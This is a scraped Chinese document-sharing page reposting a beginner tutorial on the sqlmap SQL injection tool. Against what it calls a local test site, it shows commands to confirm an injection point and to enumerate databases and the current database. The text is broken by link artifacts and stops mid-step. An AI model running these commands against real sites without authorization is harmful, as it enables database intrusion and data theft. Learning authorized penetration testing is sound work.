- 1、本文档共21页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
渗透测试工具sqlmap基础教程讲解
渗透测试工具sqlmap基础教程
转载地址: /zgyulongfei/article/details?本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。
对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。
sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由 HYPERLINK /base/11 \o Python知识库 \t _blank Python语言开发而成,因此运行需要安装python环境。
既然本文是基础教程,以下只写工具的基本使用方法。
本教程为sqlmap具体应用案例,如需了解更多sqlmap资料可以访问官方 HYPERLINK / \t _blank ?,或者乌云知识库 HYPERLINK /tips/401 \t _blank /tips/401?和? HYPERLINK /tips/143 \t _blank /tips/143?。
测试环境:本地搭建的具有sql注入点的网站?50
注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。
教程开始:
一、检测注入点是否可用
[plain]? HYPERLINK /zgyulongfei/article/details\o view plain view plain? HYPERLINK /zgyulongfei/article/details\o copy copy
?
C:\Python27\sqlmappython?sqlmap.py?-u?50/products.asp?id=134??
参数:
-u:指定注入点url
结果:
注入结果展示:
(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。
(2)web服务器系统为windows 2003 or XP
(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0
(4) HYPERLINK /base/14 \o MySQL知识库 \t _blank 数据库类型为:SQLSERVER 2000
其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:
[plain]? HYPERLINK /zgyulongfei/article/details\o view plain view plain? HYPERLINK /zgyulongfei/article/details\o copy copy
?
C:\Python27\sqlmappython?sqlmap.py?-u?50/products.asp?id=134?--batch??
二、暴库
一条命令即可曝出该sqlserver中所有数据库名称,命令如下:
[plain]? HYPERLINK /zgyulongfei/article/details\o view plain view plain? HYPERLINK /zgyulongfei/article/details\o copy copy
?
C:\Python27\sqlmappython?sqlmap.py?-u?50/products.asp?id=134?--dbs??
参数:
--dbs:dbs前面有两条杠,请看清楚。
结果:
结果显示该sqlserver中共包含7个可用的数据库。
三、web当前使用的数据库
[plain]? HYPERLINK /zgyulongfei/article/details\o view plain view plain? HYPERLINK /zgyulongfei/article/details\o copy copy
?
C:\Python27\sqlmappython?sqlmap.py?-u?50/products.asp?id=134?--current-db??
四、web数据库使用账户
[plain]? HYPERLINK /zgyulongfei/article/details\o view
您可能关注的文档
最近下载
- 上海六年级第二学期期末考试数学试卷3套(含答案)最新沪教版.doc
- 湖北省武汉市硚口区2022-2023学年七年级下学期期末考试语文试卷(含答案).docx VIP
- 2024年汉江师范学院第二批专项公开招聘工作人员27人笔试备考题库及答案解析.docx
- 农村承包地确权确股不确地方式操作流程.PDF
- 知道网课英语语法与语篇智慧树章节测试答案2023.docx
- 2022年临沂沂水县优秀村(社区)党组织书记招聘乡镇事业单位工作人员考试真题.docx VIP
- 大学四级英语模拟卷全5套(含解析).pdf VIP
- 12G901-1混凝土结构施工钢筋排布规则与构造详图(34).docx
- 2021考研英语二5500词汇(适合打印).docx
- 2023年湖北随州中考生物真题及答案.pdf VIP
文档评论(0)